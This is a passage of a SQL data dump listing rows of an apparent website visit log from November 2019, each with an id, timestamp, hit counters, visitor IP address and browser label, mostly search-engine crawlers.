'95.134.237.70','chrome'),(462389,1574255177,1,1,0,0,'141.8.142.128','other'),(462390,1574255827,1,1,0,0,'66.249.64.28','chrome'),(462391,1574256742,1,1,0,0,'95.108.213.55','other'),(462392,1574256758,1,1,0,0,'141.8.132.19','other'),(462393,1574256838,1,1,0,0,'66.249.70.62','chrome'),(462394,1574256999,1,1,0,0,'66.249.64.28','chrome'),(462395,1574257365,1,1,0,0,'90.188.255.142','chrome'),(462396,1574257624,1,1,0,0,'66.249.70.33','chrome'),(462397,1574258016,1,1,0,0,'141.8.188.38','other'),(462398,1574258041,1,1,0,0,'66.249.70.36','chrome'),(462399,1574258047,2,2,0,0,'66.249.64.26','chrome'),(462400,1574258344,1,1,0,0,'66.249.64.28','chrome'),(462401,1574258872,1,1,0,0,'91.196.178.84','chrome'),(462402,1574258882,2,2,0,0,'66.249.64.27','chrome'),(462403,1574259087,2,2,0,0,'66.249.64.26','chrome'),(462404,1574259103,1,1,0,0,'157.55.39.245','other'),(462405,1574259337,1,1,0,0,'91.196.177.46','chrome'),(462406,1574259796,2,2,0,0,'66.249.64.27','chrome'),(462407,1574260254,1,1,0,0,'66.249.64.28','chrome'),(462408,1574261016,1,1,0,0,'66.249.64.27','chrome'),(462409,1574261178,2,2,0,0,'66.249.64.28','chrome'),(462410,1574261256,1,1,0,0,'8.29.198.27','other'),(462411,1574261427,1,1,0,0,'66.249.64.26','chrome'),(462412,1574262238,1,1,0,0,'8.29.198.26','other'),(462413,1574262444,1,1,0,0,'91.196.178.181','chrome'),(462414,1574262479,1,1,0,0,'178.251.107.33','chrome'),(462415,1574262513,3,3,0,0,'66.249.64.27','chrome'),(462416,1574262548,2,2,0,0,'66.249.64.28','chrome'),(462417,1574263226,2,2,0,0,'66.249.64.26','chrome'),(462418,1574263340,1,1,0,0,'66.249.70.36','chrome'),(462419,1574263762,1,1,0,0,'173.252.87.5','other'),(462420,1574264595,1,1,0,0,'66.249.70.33','chrome'),(462421,1574264660,1,1,0,0,'66.249.64.26','chrome'),(462422,1574264928,1,1,0,0,'66.249.64.27','chrome'),(462423,1574265182,1,1,0,0,'91.196.178.86','firefox'),(462424,1574265246,3,3,0,0,'66.249.64.28','chrome'),(462425,1574265611,1,1,0,0,'130.180.208.32','chrome'),(462426,1574265782,1,1,0,0,'157.55.39.176','other'),(462427,1574267303,2,2,0,0,'66.249.64.27','chrome'),(462428,1574267656,1,1,0,0,'207.46.13.163','other'),(462429,1574267954,1,1,0,0,'95.108.213.3','other'),(462430,1574268328,2,2,0,0,'158.69.245.214','other'),(462431,1574268483,1,1,0,0,'66.249.70.33','chrome'),(462432,1574268772,1,1,0,0,'66.249.64.28','chrome'),(462433,1574269421,1,1,0,0,'46.211.244.126','chrome'),(462434,1574269779,2,2,0,0,'66.249.64.28','chrome'),(462435,1574269807,1,1,0,0,'66.249.64.26','chrome'),(462436,1574270027,1,1,0,0,'157.55.39.245','other'),(462437,1574271012,2,2,0,0,'66.249.64.27','chrome'),(462438,1574271057,1,1,0,0,'66.249.64.26','chrome'),(462439,1574271965,1,1,0,0,'178.154.200.33','other'),(462440,1574272071,1,1,0,0,'95.108.181.103','other'),(462441,1574272144,1,1,0,0,'8.29.198.26','other'),(462442,1574273063,2,2,0,0,'66.249.64.26','chrome'),(462443,1574273114,1,1,0,0,'8.29.198.27','other'),(462444,1574273449,1,1,0,0,'141.8.183.18','other'),(462445,1574273495,1,1,0,0,'66.249.64.27','chrome'),(462446,1574273583,1,1,0,0,'207.46.13.163','other'),(462447,1574274064,1,1,0,0,'66.249.64.26','chrome'),(462448,1574274294,1,1,0,0,'66.249.64.28','chrome'),(462449,1574275051,1,1,0,0,'141.8.142.132','other'),(462450,1574275054,1,1,0,0,'141.8.142.164','other'),(462451,1574275074,1,1,0,0,'141.8.142.115','other'),(462452,1574275205,1,1,0,0,'46.211.158.54','chrome'),(462453,1574276268,1,1,0,0,'5.45.207.43','other'),(462454,1574276488,1,1,0,0,'38.135.122.215','chrome'),(462455,1574277048,1,1,0,0,'66.249.70.62','chrome'),(462456,1574277433,1,1,0,0,'91.196.178.101','chrome'),(462457,1574277480,1,1,0,0,'207.46.13.163','other'),(462458,1574278212,1,1,0,0,'91.90.11.119','opera'),(462459,1574278267,3,3,0,0,'66.249.64.28','chrome'),(462460,1574278344,3,3,0,0,'66.249.64.26','chrome'),(462461,1574278493,1,1,0,0,'157.55.39.245','other'),(462462,1574279372,1,1,0,0,'141.8.188.39','chrome'),(462463,1574279566,2,2,0,0,'66.249.64.26','chrome'),(462464,1574280332,1,1,0,0,'66.249.64.28','chrome'),(462465,1574280372,1,1,0,0,'130.180.217.255','chrome'),(462466,1574280556,1,1,0,0,'141.8.188.38','chrome'),(462467,1574280568,1,1,0,0,'5.45.207.44','chrome'),(462468,1574280602,1,1,0,0,'141.8.183.18','chrome'),(462469,1574280627,1,1,0,0,'37.9.113.163','chrome'),(462470,1574281245,1,1,0,0,'91.196.178.181','chrome'),(462471,1574281788,68,68,0,0,'185.230.242.3','other'),(462472,1574281934,1,1,0,0,'95.108.213.55','chrome'),(462473,1574281949,2,2,0,0,'66.249.70.62','chrome'),(462474,1574281963,1,1,0,0,'37.9.113.202','chrome'),(462475,1574282369,3,3,0,0,'66.249.64.28','chrome'),(462476,1574282493,1,1,0,0,'66.249.64.26','chrome'),(462477,1574282804,1,1,0,0,'185.230.242.3','other'),(462478,1574282980,3,3,0,0,'66.249.64.27','chrome'),(462479,1574283008,1,1,0,0,'8.29.198.25','other'),(462480,1574283202,1,1,0,0,'141.8.142.128','other'),(462481,1574283224,1,1,0,0,'141.8.142.132','chrome'),(462482,1574283226,1,1,0,0,'213.180.203.44','chrome'),(462483,1574283735,1,1,0,0,'66.249.64.26','chrome'),(462484,1574284032,1,1,0,0,'8.29.198.27','other'),(462485,1574284036,1,1,0,0,'31.171.249.248','chrome'),(462486,1574284309,2,2,0,0,'66.249.64.28','chrome'),(462487,1574284487,2,2,0,0,'66.249.64.27','chrome'),(462488,1574284553,1,1,0,0,'141.8.132.28','chrome'),(462489,1574284621,3,3,0,0,'66.249.70.33','chrome'),(462490,1574285310,1,1,0,0,'66.249.64.26','chrome'),(462491,1574285384,1,1,0,0,'91.196.178.181','chrome'),(462492,1574285653,2,2,0,0,'66.249.64.27','chrome'),(462493,1574285926,1,1,0,0,'5.45.207.43','chrome'),(462494,1574285960,1,1,0,0,'141.8.142.177','chrome'),(462495,1574285967,1,1,0,0,'141.8.142.115','chrome'),(462496,1574286314,4,4,0,0,'66.249.64.26','chrome'),(462497,1574286347,1,1,0,0,'202.143.111.228','firefox'),(462498,1574286584,1,1,0,0,'141.8.142.177','other'),(462499,1574287229,1,1,0,0,'141.8.132.19','chrome'),(462500,1574287235,1,1,0,0,'141.8.132.28','chrome'),(462501,1574287237,1,1,0,0,'141.8.132.2','chrome'),(462502,1574287247,1,1,0,0,'141.8.188.18','chrome'),(462503,1574287258,1,1,0,0,'5.45.207.43','other'),(462504,1574287485,2,2,0,0,'66.249.64.28','chrome'),(462505,1574287506,1,1,0,0,'66.249.64.27','chrome'),(462506,1574287933,2,2,0,0,'66.249.64.26','chrome'),(462507,1574288082,1,1,0,0,'157.55.39.245','other'),(462508,1574288607,1,1,0,0,'141.8.142.177','chrome'),(462509,1574288611,1,1,0,0,'141.8.142.115','chrome'),(462510,1574288764,1,1,0,0,'95.108.213.61','chrome'),(462511,1574288786,2,2,0,0,'66.249.70.33','chrome'),(462512,1574288838,2,2,0,0,'66.249.64.28','chrome'),(462513,1574289253,209,209,0,0,'38.135.104.4','chrome'),(462514,1574289341,1,1,0,0,'66.249.64.26','chrome'),(462515,1574289378,1,1,0,0,'66.249.70.62','chrome'),(462516,1574290155,1,1,0,0,'95.108.213.3','chrome'),(462517,1574290201,1,1,0,0,'95.108.181.103','chrome'),(462518,1574290210,1,1,0,0,'141.8.132.28','chrome'),(462519,1574290432,1,1,0,0,'138.246.253.5','chrome'),(462520,1574290610,1,1,0,0,'66.249.64.27','chrome'),(462521,1574290847,1,1,0,0,'157.55.39.190','other'),(462522,1574290897,2,2,0,0,'66.249.64.28','chrome'),(462523,1574290971,1,1,0,0,'66.249.70.62','chrome'),(462524,1574291509,1,1,0,0,'95.108.213.55','chrome'),(462525,1574291532,1,1,0,0,'141.8.142.177','chrome'),(462526,1574291959,1,1,0,0,'185.212.171.156','chrome'),(462527,1574292126,1,1,0,0,'66.249.64.27','chrome'),(462528,1574293007,1,1,0,0,'141.8.142.115','chrome'),(462529,1574293024,1,1,0,0,'95.108.181.103','chrome'),(462530,1574293042,1,1,0,0,'178.154.171.7','chrome'),(462531,1574293445,1,1,0,0,'66.249.64.27','chrome'),(462532,1574293867,1,1,0,0,'8.29.198.25','other'),(462533,1574294501,1,1,0,0,'141.8.188.66','chrome'),(462534,1574294572,1,1,0,0,'5.45.207.65','chrome'),(462535,1574294798,4,4,0,0,'66.249.64.28','chrome'),(462536,1574294870,1,1,0,0,'83.169.39.166','other'),(462537,1574294912,1,1,0,0,'8.29.198.27','other'),(462538,1574294994,1,1,0,0,'66.249.64.27','chrome'),(462539,1574295037,2,2,0,0,'66.249.64.26','chrome'),(462540,1574295809,1,1,0,0,'37.9.113.97','chrome'),(462541,1574295812,1,1,0,0,'141.8.188.20','chrome'),(462542,1574295824,1,1,0,0,'37.9.113.6','chrome'),(462543,1574295856,1,1,0,0,'178.154.200.33','chrome'),(462544,1574295859,1,1,0,0,'37.9.113.163','other'),(462545,1574295862,1,1,0,0,'141.8.183.33','chrome'),(462546,1574297103,1,1,0,0,'95.108.213.3','chrome'),(462547,1574297128,1,1,0,0,'178.154.200.33','chrome'),(462548,1574297141,1,1,0,0,'141.8.142.115','chrome'),(462549,1574297144,1,1,0,0,'141.8.188.25','chrome'),(462550,1574297159,1,1,0,0,'178.154.171.66','chrome'),(462551,1574297257,1,1,0,0,'66.249.64.27','chrome'),(462552,1574298177,1,1,0,0,'5.45.207.43','chrome'),(462553,1574298187,1,1,0,0,'95.108.213.39','chrome'),(462554,1574298218,2,2,0,0,'157.55.39.176','other'),(462555,1574298232,1,1,0,0,'37.9.113.163','chrome'),(462556,1574298259,1,1,0,0,'37.9.113.202','other'),(462557,1574298464,1,1,0,0,'66.249.64.28','chrome'),(462558,1574299061,1,1,0,0,'66.249.64.26','chrome'),(462559,1574299395,1,1,0,0,'5.45.207.65','chrome'),(462560,1574299448,1,1,0,0,'95.108.213.39','chrome'),(462561,1574299451,1,1,0,0,'178.154.200.27','chrome'),(462562,1574299474,1,1,0,0,'141.8.132.28','chrome'),(462563,1574300598,1,1,0,0,'141.8.188.20','chrome'),(462564,1574300601,1,1,0,0,'141.8.142.132','chrome'),(462565,1574300640,1,1,0,0,'178.154.171.66','chrome'),(462566,1574300691,1,1,0,0,'95.108.213.61','chrome'),(462567,1574300819,2,2,0,0,'66.249.64.27','chrome'),(462568,1574301529,1,1,0,0,'66.249.70.33','chrome'),(462569,1574301645,1,1,0,0,'66.249.64.26','chrome'),(462570,1574301919,1,1,0,0,'37.9.113.142','chrome'),(462571,1574301940,1,1,0,0,'141.8.188.66','chrome'),(462572,1574301944,1,1,0,0,'37.9.113.6','chrome'),(462573,1574301957,1,1,0,0,'141.8.188.38','chrome'),(462574,1574303149,1,1,0,0,'66.249.64.28','chrome'),(462575,1574303167,1,1,0,0,'178.154.200.27','chrome'),(462576,1574303171,1,1,0,0,'95.108.181.103','chrome'),(462577,1574303228,1,1,0,0,'141.8.188.38','other'),(462578,1574303602,1,1,0,0,'66.249.70.62','chrome'),(462579,1574304061,1,1,0,0,'66.249.64.26','chrome'),(462580,1574304313,1,1,0,0,'207.46.13.77','other'),(462581,1574304437,2,2,0,0,'66.249.64.28','chrome'),(462582,1574304482,1,1,0,0,'141.8.188.20','chrome'),(462583,1574304527,1,1,0,0,'141.8.142.177','chrome'),(462584,1574304626,1,1,0,0,'37.9.113.6','chrome'),(462585,1574304694,1,1,0,0,'66.249.64.27','chrome'),(462586,1574304751,1,1,0,0,'66.249.70.62','chrome'),(462587,1574304761,1,1,0,0,'8.29.198.26','other'),(462588,1574305832,1,1,0,0,'5.45.207.65','chrome'),(462589,1574305836,1,1,0,0,'8.29.198.25','other'),(462590,1574305849,1,1,0,0,'141.8.132.19','chrome'),(462591,1574305879,1,1,0,0,'207.46.13.77','other'),(462592,1574306199,1,1,0,0,'66.249.64.26','chrome'),(462593,1574306543,1,1,0,0,'66.249.64.27','chrome'),(462594,1574307093,1,1,0,0,'37.9.113.6','chrome'),(462595,1574307119,1,1,0,0,'5.45.207.65','chrome'),(462596,1574307123,1,1,0,0,'141.8.188.25','chrome'),(462597,1574307127,1,1,0,0,'141.8.132.19','chrome'),(462598,1574307159,1,1,0,0,'5.255.253.8','chrome'),(462599,1574307729,1,1,0,0,'66.249.64.28','chrome'),(462600,1574308429,1,1,0,0,'141.8.188.66','chrome'),(462601,1574308432,1,1,0,0,'178.154.171.35','chrome'),(462602,1574308604,1,1,0,0,'66.249.64.27','chrome'),(462603,1574308660,1,1,0,0,'66.249.70.33','chrome'),(462604,1574308973,1,1,0,0,'13.66.139.0','other'),(462605,1574308989,1,1,0,0,'66.249.64.28','chrome'),(462606,1574309715,1,1,0,0,'95.108.213.3','chrome'),(462607,1574309727,1,1,0,0,'141.8.188.18','chrome'),(462608,1574309733,1,1,0,0,'141.8.188.38','chrome'),(462609,1574309779,1,1,0,0,'95.108.213.55','chrome'),(462610,1574310028,1,1,0,0,'191.96.41.30','chrome'),(462611,1574310302,2,2,0,0,'66.249.64.26','chrome'),(462612,1574310307,2,2,0,0,'66.249.64.27','chrome'),(462613,1574311050,1,1,0,0,'178.154.200.33','chrome'),(462614,1574311066,1,1,0,0,'5.45.207.65','chrome'),(462615,1574311130,1,1,0,0,'207.46.13.77','other'),(462616,1574312069,1,1,0,0,'66.249.70.62','chrome'),(462617,1574312128,1,1,0,0,'37.9.113.202','chrome'),(462618,1574312140,1,1,0,0,'95.108.181.103','chrome'),(462619,1574312272,1,1,0,0,'178.154.171.66','chrome'),(462620,1574312293,1,1,0,0,'207.46.13.77','other'),(462621,1574313364,1,1,0,0,'141.8.183.18','chrome'),(462622,1574313366,1,1,0,0,'178.154.200.71','chrome'),(462623,1574313369,1,1,0,0,'178.154.171.7','chrome'),(462624,1574313459,1,1,0,0,'66.249.70.33','chrome'),(462625,1574313504,1,1,0,0,'66.249.64.28','chrome'),(462626,1574313795,1,1,0,0,'66.249.64.27','chrome'),(462627,1574313830,1,1,0,0,'66.249.64.26','chrome'),(462628,1574314689,1,1,0,0,'37.9.113.97','chrome'),(462629,1574315175,1,1,0,0,'66.249.70.33','chrome'),(462630,1574315229,1,1,0,0,'66.249.64.27','chrome'),(462631,1574315544,2,2,0,0,'66.249.64.26','chrome'),(462632,1574315635,1,1,0,0,'8.29.198.25','other'),(462633,1574316119,1,1,0,0,'95.108.213.39','chrome'),(462634,1574316163,1,1,0,0,'141.8.188.20','chrome'),(462635,1574316248,1,1,0,0,'141.8.188.25','chrome'),(462636,1574316303,1,1,0,0,'66.249.70.62','chrome'),(462637,1574316389,1,1,0,0,'66.249.64.28','chrome'),(462638,1574316723,1,1,0,0,'8.29.198.27','other'),(462639,1574316799,1,1,0,0,'5.45.207.65','other'),(462640,1574317267,1,1,0,0,'66.249.64.26','chrome'),(462641,1574317435,1,1,0,0,'95.108.213.3','chrome'),(462642,1574317438,1,1,0,0,'141.8.188.20','chrome'),(462643,1574317441,1,1,0,0,'141.8.188.18','chrome'),(462644,1574317444,1,1,0,0,'213.180.203.37','chrome'),(462645,1574317447,1,1,0,0,'178.154.200.33','chrome'),(462646,1574317450,1,1,0,0,'141.8.132.37','chrome'),(462647,1574317494,1,1,0,0,'141.8.132.19','other'),(462648,1574317516,1,1,0,0,'37.9.113.163','other'),(462649,1574317585,1,1,0,0,'66.249.64.28','chrome'),(462650,1574317797,1,1,0,0,'66.249.70.62','chrome'),(462651,1574318031,1,1,0,0,'91.196.178.84','chrome'),(462652,1574318129,1,1,0,0,'141.8.142.119','other'),(462653,1574318717,1,1,0,0,'141.8.142.115','chrome'),(462654,1574318744,1,1,0,0,'178.154.200.27','chrome'),(462655,1574318750,1,1,0,0,'95.108.213.39','chrome'),(462656,1574318753,1,1,0,0,'95.108.181.103','chrome'),(462657,1574318758,1,1,0,0,'37.9.113.142','chrome'),(462658,1574319373,1,1,0,0,'66.249.64.27','chrome'),(462659,1574319418,1,1,0,0,'141.8.142.119','other'),(462660,1574319804,2,2,0,0,'66.249.64.28','chrome'),(462661,1574319960,2,2,0,0,'66.249.64.26','chrome'),(462662,1574320030,1,1,0,0,'157.55.39.190','other'),(462663,1574320266,1,1,0,0,'141.8.142.128','other'),(462664,1574320336,1,1,0,0,'141.8.188.39','other'),(462665,1574320383,1,1,0,0,'141.8.188.66','other'),(462666,1574320386,1,1,0,0,'141.8.188.18','chrome'),(462667,1574320427,1,1,0,0,'91.196.178.84','chrome'),(462668,1574320549,1,1,0,0,'176.195.30.51','msie'),(462669,1574320553,1,1,0,0,'95.84.223.67','msie'),(462670,1574320846,1,1,0,0,'66.249.64.28','chrome'),(462671,1574321080,1,1,0,0,'207.46.13.77','other'),(462672,1574321524,1,1,0,0,'141.8.132.28','chrome'),(462673,1574321527,1,1,0,0,'37.9.113.142','chrome'),(462674,1574321529,1,1,0,0,'141.8.188.39','chrome'),(462675,1574321531,1,1,0,0,'95.108.213.61','chrome'),(462676,1574321533,1,1,0,0,'141.8.142.132','chrome'),(462677,1574321535,1,1,0,0,'141.8.183.33','chrome'),(462678,1574321542,1,1,0,0,'5.45.207.65','chrome'),(462679,1574321543,4,4,0,0,'66.249.64.26','chrome'),(462680,1574321584,1,1,0,0,'95.108.213.39','other'),(462681,1574321897,2,1,1,0,'66.249.70.62',''),(462682,1574321899,1,1,0,0,'66.249.64.28','chrome'),(462683,1574322115,1,1,0,0,'66.249.70.36','chrome'),(462684,1574322801,1,1,0,0,'141.8.188.18','chrome'),(462685,1574322816,1,1,0,0,'66.249.64.28','chrome'),(462686,1574323012,1,1,0,0,'141.8.142.115','chrome'),(462687,1574323016,1,1,0,0,'141.8.142.119','chrome'),(462688,1574323299,1,1,0,0,'66.249.70.33','chrome'),(462689,1574323884,1,1,0,0,'66.249.64.26','chrome'),(462690,1574324120,1,1,0,0,'95.108.213.55','chrome'),(462691,1574324158,1,1,0,0,'141.8.188.25','chrome'),(462692,1574324204,1,1,0,0,'178.154.171.66','other'),(462693,1574324414,1,1,0,0,'207.46.13.77','other'),(462694,1574324532,1,1,0,0,'195.5.16.29','chrome'),(462695,1574324662,1,1,0,0,'157.55.39.190','other'),(462696,1574324693,1,1,0,0,'141.8.142.115','other'),(462697,1574324966,2,2,0,0,'66.249.64.26','chrome'),(462698,1574325321,1,1,0,0,'66.249.70.36','chrome'),(462699,1574325388,1,1,0,0,'66.249.64.27','chrome'),(462700,1574325478,1,1,0,0,'195.5.16.29','chrome'),(462701,1574325517,1,1,0,0,'141.8.188.20','chrome'),(462702,1574325520,1,1,0,0,'178.154.200.71','chrome'),(462703,1574325556,1,1,0,0,'37.9.113.163','chrome'),(462704,1574326331,1,1,0,0,'66.249.64.26','chrome'),(462705,1574326371,1,1,0,0,'141.8.188.66','other'),(462706,1574326485,1,1,0,0,'8.29.198.27','other'),(462707,1574326719,2,2,0,0,'66.249.64.27','chrome'),(462708,1574326781,1,1,0,0,'141.8.132.28','chrome'),(462709,1574326791,1,1,0,0,'37.9.113.97','chrome'),(462710,1574327439,2,2,0,0,'66.249.64.28','chrome'),(462711,1574327627,1,1,0,0,'8.29.198.25','other'),(462712,1574327905,1,1,0,0,'66.249.64.27','chrome'),(462713,1574327977,2,2,0,0,'95.91.15.173','other'),(462714,1574328227,1,1,0,0,'37.9.113.200','chrome'),(462715,1574328249,1,1,0,0,'37.9.113.163','chrome'),(462716,1574328268,1,1,0,0,'5.45.207.49','chrome'),(462717,1574328379,1,1,0,0,'66.249.64.28','chrome'),(462718,1574328783,2,2,0,0,'66.249.70.62','chrome'),(462719,1574328826,2,2,0,0,'66.249.64.26','chrome'),(462720,1574328880,1,1,0,0,'66.249.70.33','chrome'),(462721,1574328996,1,1,0,0,'3.209.82.240','chrome'),(462722,1574329092,2,2,0,0,'66.249.64.27','chrome'),(462723,1574329874,1,1,0,0,'66.249.64.26','chrome'),(462724,1574330227,1,1,0,0,'66.249.64.28','chrome'),(462725,1574330912,1,1,0,0,'178.154.200.33','chrome'),(462726,1574331266,2,2,0,0,'66.249.64.26','chrome'),(462727,1574331504,2,2,0,0,'207.46.13.77','other'),(462728,1574332040,1,1,0,0,'66.249.64.28','chrome'),(462729,1574332112,1,1,0,0,'95.108.213.3','chrome'),(462730,1574332116,1,1,0,0,'37.9.113.200','chrome'),(462731,1574332119,1,1,0,0,'141.8.188.66','chrome'),(462732,1574332329,1,1,0,0,'66.249.76.122','chrome'),(462733,1574332613,1,1,0,0,'91.196.178.98','chrome'),(462734,1574332670,1,1,0,0,'66.249.64.26','chrome'),(462735,1574333498,1,1,0,0,'66.249.70.33','chrome'),(462736,1574333521,1,1,0,0,'5.255.253.8','chrome'),(462737,1574333623,1,1,0,0,'37.9.113.142','other'),(462738,1574333719,1,1,0,0,'91.196.178.61','chrome'),(462739,1574333770,1,1,0,0,'66.249.64.27','chrome'),(462740,1574334174,1,1,0,0,'66.249.64.26','chrome'),(462741,1574334375,1,1,0,0,'66.249.64.28','chrome'),(462742,1574334810,1,1,0,0,'213.180.203.37','chrome'),(462743,1574334878,1,1,0,0,'13.66.139.0','other'),(462744,1574334946,1,1,0,0,'109.74.154.72','chrome'),(462745,1574335052,1,1,0,0,'95.108.213.39','other'),(462746,1574335390,2,2,0,0,'157.55.39.190','other'),(462747,1574335728,1,1,0,0,'207.46.13.77','other'),(462748,1574336148,1,1,0,0,'213.180.203.37','chrome'),(462749,1574336153,1,1,0,0,'178.154.200.33','other'),(462750,1574336156,1,1,0,0,'37.9.113.163','other'),(462751,1574336159,1,1,0,0,'141.8.142.115','chrome'),(462752,1574336582,2,2,0,0,'66.249.64.27','chrome'),(462753,1574337273,1,1,0,0,'66.249.64.26','chrome'),(462754,1574337353,1,1,0,0,'8.29.198.25','other'),(462755,1574337462,1,1,0,0,'157.55.39.90','other'),(462756,1574337501,1,1,0,0,'141.8.142.119','chrome'),(462757,1574337535,1,1,0,0,'66.249.64.28','chrome'),(462758,1574338532,1,1,0,0,'8.29.198.26','other'),(462759,1574338761,1,1,0,0,'157.55.39.90','other'),(462760,1574338968,1,1,0,0,'37.9.113.200','other'),(462761,1574339091,1,1,0,0,'178.154.171.7','chrome'),(462762,1574339094,1,1,0,0,'37.9.113.97','chrome'),(462763,1574339107,1,1,0,0,'37.9.113.39','chrome'),(462764,1574339617,1,1,0,0,'13.66.139.0','other'),(462765,1574340205,1,1,0,0,'157.55.39.190','other'),(462766,1574340225,2,2,0,0,'66.249.64.27','chrome'),(462767,1574340268,1,1,0,0,'141.8.188.39','chrome'),(462768,1574340272,1,1,0,0,'95.108.213.3','chrome'),(462769,1574340276,1,1,0,0,'87.250.224.104','chrome'),(462770,1574340333,3,3,0,0,'157.55.39.198','other'),(462771,1574341217,2,2,0,0,'66.249.64.26','chrome'),(462772,1574341293,2,2,0,0,'66.249.64.27','chrome'),(462773,1574341599,1,1,0,0,'141.8.183.18','other'),(462774,1574341633,1,1,0,0,'178.154.200.33','chrome'),(462775,1574341635,1,1,0,0,'178.154.200.13','chrome'),(462776,1574341676,1,1,0,0,'5.255.253.8','chrome'),(462777,1574341709,1,1,0,0,'157.55.39.198','other'),(462778,1574341775,1,1,0,0,'93.175.222.175','chrome'),(462779,1574342462,2,2,0,0,'66.249.64.27','chrome'),(462780,1574342916,1,1,0,0,'178.154.200.33','chrome'),(462781,1574342920,1,1,0,0,'87.250.224.90','chrome'),(462782,1574342923,1,1,0,0,'95.108.213.55','chrome'),(462783,1574343372,1,1,0,0,'66.249.64.27','chrome'),(462784,1574343644,1,1,0,0,'66.249.64.28','chrome'),(462785,1574344470,1,1,0,0,'141.8.142.132','chrome'),(462786,1574344473,1,1,0,0,'213.180.203.37','chrome'),(462787,1574344476,1,1,0,0,'87.250.224.90','chrome'),(462788,1574344541,1,1,0,0,'5.135.194.250','firefox'),(462789,1574344651,1,1,0,0,'91.196.178.61','chrome'),(462790,1574345071,1,1,0,0,'178.54.130.68','firefox'),(462791,1574345396,2,2,0,0,'66.249.70.62','chrome'),(462792,1574345540,1,1,0,0,'207.46.13.121','other'),(462793,1574345575,1,1,0,0,'193.106.30.99','chrome'),(462794,1574345641,1,1,0,0,'95.108.213.3','chrome'),(462795,1574345654,1,1,0,0,'141.8.188.20','chrome'),(462796,1574346040,1,1,0,0,'66.249.64.26','chrome'),(462797,1574346138,1,1,0,0,'66.249.64.27','chrome'),(462798,1574346401,1,1,0,0,'66.249.70.36','chrome'),(462799,1574346703,1,1,0,0,'66.249.64.28','chrome'),(462800,1574347452,2,2,0,0,'66.249.64.27','chrome'),(462801,1574347761,1,1,0,0,'37.53.192.103','firefox'),(462802,1574347837,1,1,0,0,'91.124.115.213','chrome'),(462803,1574348261,1,1,0,0,'8.29.198.25','other'),(462804,1574348331,1,1,0,0,'141.8.142.132','chrome'),(462805,1574348388,1,1,0,0,'178.154.200.33','other'),(462806,1574348418,1,1,0,0,'5.45.207.65','chrome'),(462807,1574348785,1,1,0,0,'38.99.62.94','other'),(462808,1574348859,2,2,0,0,'66.249.64.27','chrome'),(462809,1574349188,3,3,0,0,'66.249.64.26','chrome'),(462810,1574349440,1,1,0,0,'8.29.198.26','other'),(462811,1574349621,2,2,0,0,'66.249.64.28','chrome'),(462812,1574349708,1,1,0,0,'141.8.188.38','chrome'),(462813,1574349986,1,1,0,0,'66.249.64.27','chrome'),(462814,1574350401,1,1,0,0,'141.8.183.18','other'),(462815,1574351013,1,1,0,0,'141.8.142.132','chrome'),(462816,1574351016,1,1,0,0,'141.8.188.66','chrome'),(462817,1574351019,1,1,0,0,'37.9.113.6','chrome'),(462818,1574351022,1,1,0,0,'141.8.183.33','chrome'),(462819,1574351058,1,1,0,0,'141.8.183.18','chrome'),(462820,1574351076,1,1,0,0,'37.9.113.200','chrome'),(462821,1574351089,1,1,0,0,'141.8.188.38','chrome'),(462822,1574351092,1,1,0,0,'178.154.200.33','chrome'),(462823,1574351263,1,1,0,0,'157.55.39.90','other'),(462824,1574351282,1,1,0,0,'66.249.64.27','chrome'),(462825,1574351568,1,1,0,0,'207.46.13.121','other'),(462826,1574352395,1,1,0,0,'5.45.207.65','other'),(462827,1574352639,1,1,0,0,'66.249.70.62','chrome'),(462828,1574352742,2,2,0,0,'66.249.64.27','chrome'),(462829,1574352981,2,2,0,0,'66.249.64.26','chrome'),(462830,1574353400,1,1,0,0,'91.196.178.181','chrome'),(462831,1574353729,1,1,0,0,'31.13.127.7','other'),(462832,1574353730,1,1,0,0,'31.13.127.23','other'),(462833,1574353743,1,1,0,0,'37.9.113.200','other'),(462834,1574353747,1,1,0,0,'141.8.142.132','other'),(462835,1574354047,3,3,0,0,'66.249.64.26','chrome'),(462836,1574354602,1,1,0,0,'157.55.39.198','other'),(462837,1574354952,1,1,0,0,'37.9.113.163','chrome'),(462838,1574354978,1,1,0,0,'178.154.171.66','chrome'),(462839,1574355018,1,1,0,0,'207.46.13.121','other'),(462840,1574355021,1,1,0,0,'87.250.224.104','other'),(462841,1574355024,1,1,0,0,'141.8.188.18','other'),(462842,1574355366,1,1,0,0,'95.108.213.61','other'),(462843,1574355752,2,2,0,0,'66.249.64.28','chrome'),(462844,1574356151,1,1,0,0,'66.249.64.26','chrome'),(462845,1574356229,1,1,0,0,'95.108.213.39','chrome'),(462846,1574356305,1,1,0,0,'5.45.207.44','other'),(462847,1574357589,1,1,0,0,'37.9.113.200','chrome'),(462848,1574357638,1,1,0,0,'178.154.200.33','other'),(462849,1574357641,1,1,0,0,'37.9.113.163','chrome'),(462850,1574358045,4,4,0,0,'66.249.64.26','chrome'),(462851,1574358912,1,1,0,0,'87.250.224.90','chrome'),(462852,1574358915,1,1,0,0,'141.8.142.177','other'),(462853,1574358930,2,2,0,0,'66.249.64.28','chrome'),(462854,1574358941,1,1,0,0,'37.9.113.142','chrome'),(462855,1574358957,1,1,0,0,'141.8.188.20','chrome'),(462856,1574358960,1,1,0,0,'37.9.113.177','chrome'),(462857,1574358969,1,1,0,0,'141.8.188.38','chrome'),(462858,1574358975,1,1,0,0,'141.8.132.31','other'),(462859,1574358995,1,1,0,0,'95.108.213.61','chrome'),(462860,1574359026,1,1,0,0,'66.249.70.36','chrome'),(462861,1574359112,1,1,0,0,'66.249.64.26','chrome'),(462862,1574359127,1,1,0,0,'8.29.198.26','other'),(462863,1574359175,1,1,0,0,'66.249.70.62','chrome'),(462864,1574359450,1,1,0,0,'91.196.178.18','chrome'),(462865,1574359875,1,1,0,0,'66.249.64.28','chrome'),(462866,1574360256,1,1,0,0,'141.8.142.177','chrome'),(462867,1574360273,1,1,0,0,'37.9.113.10','chrome'),(462868,1574360339,1,1,0,0,'8.29.198.26','other'),(462869,1574361175,1,1,0,0,'5.45.207.65','other'),(462870,1574361560,1,1,0,0,'141.8.183.15','chrome'),(462871,1574361577,1,1,0,0,'178.154.200.13','chrome'),(462872,1574361589,1,1,0,0,'141.8.142.50','chrome'),(462873,1574361648,1,1,0,0,'37.9.113.177','chrome'),(462874,1574361754,1,1,0,0,'213.180.203.37','other'),(462875,1574362898,1,1,0,0,'37.9.113.33','other'),(462876,1574362901,1,1,0,0,'141.8.142.128','other'),(462877,1574363249,1,1,0,0,'95.108.213.55','chrome'),(462878,1574363252,1,1,0,0,'141.8.183.15','chrome'),(462879,1574363254,1,1,0,0,'141.8.132.2','chrome'),(